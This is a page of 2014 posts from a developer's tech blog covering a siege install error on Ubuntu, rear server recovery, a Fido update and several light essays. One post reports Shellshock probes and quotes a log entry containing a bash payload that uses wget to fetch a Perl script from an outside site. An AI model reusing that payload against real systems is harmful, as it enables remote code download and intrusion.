Fork me on Github
Fork me on Github

Joe Dog Software

Proudly serving the Internets since 1999

Siege 3.x.x On Ubuntu

By jdfulmer | Published October 3, 2014 | Leave a comment

Your JoeDog uses Ubuntu Linux on his laptop. A few years ago he was deep in siege development and he was caught without a working copy. “I wonder if … ” Your JoeDog thought, “I wonder if Ubuntu has it.” He ran ‘sudo apt-get install siege’ and there it was, ready for installation. The Big Boys were distributing his software and Your JoeDog was convinced that he was a Somebody.

If this happens to you, if a major vendor starts to distribute your software and you feel the need to tell people about it, take an opportunity to learn this lesson: nobody gives a shit. It’s a great feeling so you’ll probably ignore it. You’ll puff your chest and tell people, “Debian is distributing my software!” Instead of a pat on the back, you’ll hear “What’s Debian?” You’ll tell them and they’ll quickly change the subject. Trust the JoeDog on this one: nobody gives a shit. Your wife might give you a poorly acted, “That’s great, honey.” but at the end of the day, your software project excites people as much as your fantasy football team.

Now turn the clock up a few years. Yesterday Your JoeDog had an encounter with a with a compromised Mormon dating site. He wanted to see what software they were running so he ran ‘siege -g http://singlesaints.com/’ on his snazzy new System76 laptop. Turns out he didn’t have a copy. But wait a second: Ubuntu distributes siege, remember?

“What’s Ubuntu?” — See, I told you nobody cares.

When he went to run that command with Ubuntu’s siege he got this message: ‘siege: error while loading shared libraries: libssl.so.1.0.0: No such file or directory’

In recent days, our log aggregator has been telling us that many of you are googling ‘ubuntu siege libssl’ and it suddenly became clear why you were doing that. This nerdblogger decided to investigate the cause and document it here. As a diligent nerdblogger, he uninstalled siege in order to document the the problem from scratch. Funny thing. When he ran siege after the second install in order to capture the error message, there was no error message. Siege worked.

At this point all that is known is this:

  1. There appears to be a problem with siege on Ubuntu
  2. Here’s the error message: libssl.so.1.0.0: No such file of directory’
  3. libssl.so.1.0.0 was installed on the laptop in which this error was encountered
  4. After removing siege with ‘sudo apt-get remove siege’ and
  5. Reinstalling it with ‘sudo apt-get install siege’
  6. It worked.
  7. Your mileage will vary. If the problem persists you should post to the Ubuntu forums 

 

 

 



Incoming!!

By jdfulmer | Published October 2, 2014 | Leave a comment

I don’t know about you, but Your JoeDog is shell shocked. His logs are filled with stuff like this:

173.245.53.136 – – [25/Sep/2014:16:42:37 -0400] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.1” 301 – “-” “() { :;}; /bin/bash -c “/usr/bin/wget http://singlesaints.com/firefile/temp?h=joedog.org -O /tmp/a.pl””

So what’s happening here? Basically, some asshole is trying to exploit last week’s widely publicized bash shell vulnerability to invoke wget and pull down a perl script named “a.pl”

First of all, Your JoeDog hates scripts with an extension to designate the language in which they were coded. The person running the script doesn’t care what language it runs under. The computer will read the sh-bang line (#!/bin/perl) and call the appropriate interpreter. What’s the point of adding .pl? When you attack JoeDog’s computers please do so without a file extension, mmmmkay?

Second of all, he’s not going to find wget. On Your JoeDog’s computer it was installed in /bin/wget. But don’t bother trying to invoke it from there either. In accordance with best practice, it was moved it to a non-standard location. (You should do that, too.)

So while many of us are annoyed with this vulnerability, security firms and tech news companies are peeing themselves with excitement.

Dice tells us about ThreatStream, a cyber intelligence firm who’ve released ShockPot, a shell-shock honey pot. You can set it up on an publicly accessible server and watch knuckleheads try to ‘sploit you. Sounds like somebody needs a hobby.

Dice downloaded the software package and set it up on Linode, a Linux hosting site. Within a few days, they were shell-shocked seven times. Instead of wasting their time with honey pots, they could come over here and tail Your JoeDog’s logs. He was attacked 18 times in the last eight hours.

NOTE: The script they tried to pull was hosted on singlesaints.com, a Mormon dating site located in Utah. Your JoeDog attempted to snag that file for examination and they blocked his request.

HTTP request sent, awaiting response... 403 Forbidden

Props to all the single Mormon nerds who helped fix that issue in a timely fashion.

 

 



Beer Makes You Smarter

By jdfulmer | Published October 1, 2014 | Leave a comment

Many of you are programmers which means you drink coffee. After all, what is a programmer but a device that turns caffeine into code? After a long day of coding nothing takes the edge off like a nice cool beer. I’ll bet many of you drink that beverage, too. Hey, look! Important beer news from the Pacific Northwest

Researchers at Oregon State University discovered that doses of xanthohumol, a flavonoid found in hops, improved memory and thinking in a lucky group of mice.

If beer makes you smarter, then we’ll be even better programmers amirite?

it would require drinking 2,000 liters of beer a day (or 5,636 bottles of beer) to ingest the amount of xanthohumol used in the study.

The first fifty-six-hundred go down easy, it’s those last few that require a little extra effort….

 

 



The Times Discovers Bayesian Statistics

By jdfulmer | Published October 1, 2014 | Leave a comment

From the Article:

A famously counterintuitive puzzle that lends itself to a Bayesian approach is the Monty Hall problem, in which Mr. Hall, longtime host of the game show “Let’s Make a Deal,” hides a car behind one of three doors and a goat behind each of the other two. The contestant picks Door No. 1, but before opening it, Mr. Hall opens Door No. 2 to reveal a goat. Should the contestant stick with No. 1 or switch to No. 3, or does it matter?

A Bayesian calculation would start with one-third odds that any given door hides the car, then update that knowledge with the new data: Door No. 2 had a goat. The odds that the contestant guessed right — that the car is behind No. 1 — remain one in three. Thus, the odds that she guessed wrong are two in three. And if she guessed wrong, the car must be behind Door No. 3. So she should indeed switch.

[NY Times: The Odds, Continually Updated]

 



Rear Recovery Onto Different Hardware

By jdfulmer | Published October 1, 2014 | Leave a comment

Your JoeDog still likes rear.

He uses it for bare metal recovery and system cloning. Recently he had to clone one server onto older hardware as part of a disaster recovery exercise. It was problematic.

Problem one: The rear recovery disk could not connect to the network.

This system had bonded NICs and Your JoeDog started to suspect they were causing an issue. When the recovery disk booted, he brought down all the network interfaces and tried to assign a new address to the server. The routing table looked fine. The eth0 config looked fine, but the network was unreachable.

Acting on a hunch that bonded NICs were giving him fits, Your JoeDog did a recursive grep of the rear directory …

… wait a minute, what’s a recursive grep?
You can do it like this:

$ find /usr/share/rear -print | xargs egrep -i bond

Cool, thanks …

Anyway, as a result of that search, he found this feature: SIMPLIFY_BONDING With a little more digging, he discovered that it takes ‘y’ or ‘n’ so Your JoeDog set it to y and re-archived the server. He added that directive to local.conf

SIMPLIFY_BONDING=y

When the server booted from the new recovery disk, the only network interface was eth0. Your JoeDog reset that address with ifconfig and he was able to clone the server from his rear archive. SUCCESS!!!!

Problem two: No success! After the rear recovery, the kernel panic’d and the server wouldn’t boot. Unhappy sad time. 

Your JoeDog was all, “Hmmm I’ll bet I need to rebuild the kernel for new hardware….”

So he restored again from rear. This time, when the recovery was complete, he chroot’d the mount point and rebuilt the kernel.

… wait a minute! How do you do that?
Glad you asked. Here’s my command history:

$ chroot /mnt/local
$ export PATH=/sbin:/bin:/usr/sbin:/usr/bin
$ cd /boot
$ mkinitrd -f -v initrd-2.6.32-431.20.3.el6.x86_64kdump.img 
                 2.6.32-431.20.3.el6.x86_64

NOTE: Whatever you call the kernel, i.e., whatever you use for the second argument of mkinitrd, make sure you have a directory by the same name in /lib/modules, i.e., /lib/modules/2.6.32-431.20.3.el6.x86_64

DOUBLE NOTE: Once you’re inside /boot, do an ls to find available kernel images. They’ll begin with initrd- and end in .img

Now get yourself some rear.

 



Dunning–Kruger Effect

By jdfulmer | Published September 30, 2014 | Leave a comment

the dumbest man on the internetsYour JoeDog once worked with a programmer who couldn’t program. Now you’re probably thinking, isn’t programming an important qualification for that position? Not in a large corporation. To succeed in that environment, you need buzzwords and cliches. If you have them, managers just  assume you know what you’re talking about.

This particular non-programmer — or Ouch! as we liked to call him — was hired to build a Intranet site. It took him a year and a half to construct something that looked like your eight-year old nephew slapped together in a weekend. It was slow, poorly marked-up but at least it had a confusing layout and design.  Ouch had a parry for its shortcomings: Microsoft. “IE is a horrible web browser. It violates standards and ActiveX has a mind of its own.”

An appropriate response would have been, “If that’s true, how come all these non-Ouch sites look fine and work well in IE?” Instead, he received an award.

Because Ouch could steal someone else’s files and alter their markup to render the company’s text and images, we concede that he had some skill.  Armed with a comprehensive understanding of his craft, Ouch would have also known: 1.) How to work around a browser’s weaknesses by 2.) Stealing  the javascript, too, as it probably fixed those weaknesses but then he would have known too much and realized 3.) He was in the wrong profession.

While Ouch was laboring over his Intranet and ankle-deep in Cold Fusion, we were building an enterprise site with J2EE. And while Ouch didn’t know much, he did know this: in nerd hierarchy, Cold Fusion falls way below java.

So Ouch told everyone — and I mean everyone, his peers, his managers, the cleaning crew that he should be programming in java. To prove his point, he got the java logo tattooed on his bicep … which he showed to everyone.

Here’s the thing: Ouch wasn’t smart enough to know he couldn’t program in java. And management wasn’t smart enough to know he couldn’t program in java. The next thing you know, Ouch was stealing O’Reilly code — including the copyright notice — and attempting to implement the usecase. As far as I can tell, in one year in that position he didn’t release a thing that wasn’t immediately rewritten by somebody else.

Eventually Ouch was sacked but not for incompetence, he called his immediate supervisor the c-word. Management never considered him anything but a fine programmer. The buzzwords he used matched the ones they read in trade rags. How could he be anything but brilliant?

I didn’t realize it at the time but Ouch and the managers who considered him competent all suffered from the Dunning–Kruger Effect.

 



Shellshocked

By jdfulmer | Published September 30, 2014 | Leave a comment

Wired provides an interesting angle on the bash shell bug that has all your panties in a bind

[Brian] Fox drove those tapes to California and went back to work on Bash, other engineers started using the software and even helped build it. And as UNIX gave rise to GNU and Linux—the OS that drives so much of the modern internet—Bash found its way onto tens of thousands of machines. But somewhere along the way, in about 1992, one engineer typed a bug into the code. Last week, more then twenty years later, security researchers finally noticed this flaw in Fox’s ancient program. They called it Shellshock, and they warned it could allow hackers to wreak havoc on the modern internet.

[Wired: The Internet Is Broken]

 



Is Hardware Outpacing Software Or Is It The Other Way Around?

By jdfulmer | Published September 27, 2014 | Leave a comment

Here’s an interesting experiment.

After hearing two strong players argue that the only real progress in chess engines in the last ten years was due to faster computers a special match was played to challenge this idea. Komodo 8 ran on a smartphone while a top engine of 2006 used a modern i7 computer that runs 50 times faster. This is the difference between Usain Bolt and the Concorde. Guess what happened?

 

 



Fido 1.1.3

By jdfulmer | Published September 27, 2014 | Leave a comment

Your JoeDog had a requirements change. “Stupid requirements!” He had to ensure each file in a directory and all its sub-directories was less than eight days old. Unfortunately, Your Fido didn’t traverse directory trees. He stood watch only at the top of the tree.

That’s the problem with dogs: they have a mind of their own.

Without much effort, fido learned a new trick. It now recursively searches a directory for files. To leverage this feature, you’ll have to give it a command. “Recurse, boy, recurse!”

/export {
 rules = exceeds 7 days
 exclude = ^.|CVS|Makefile
 action = /usr/local/bin/sendtrap.sh
 recurse = true
}

recurse takes one of two values, true or false. True means search the tree and false means remain at the top level. If you don’t set a recurse directive, then fido will treat it as false, i.e., it will remain in the top directory.

[Trending: Fido-1.1.3]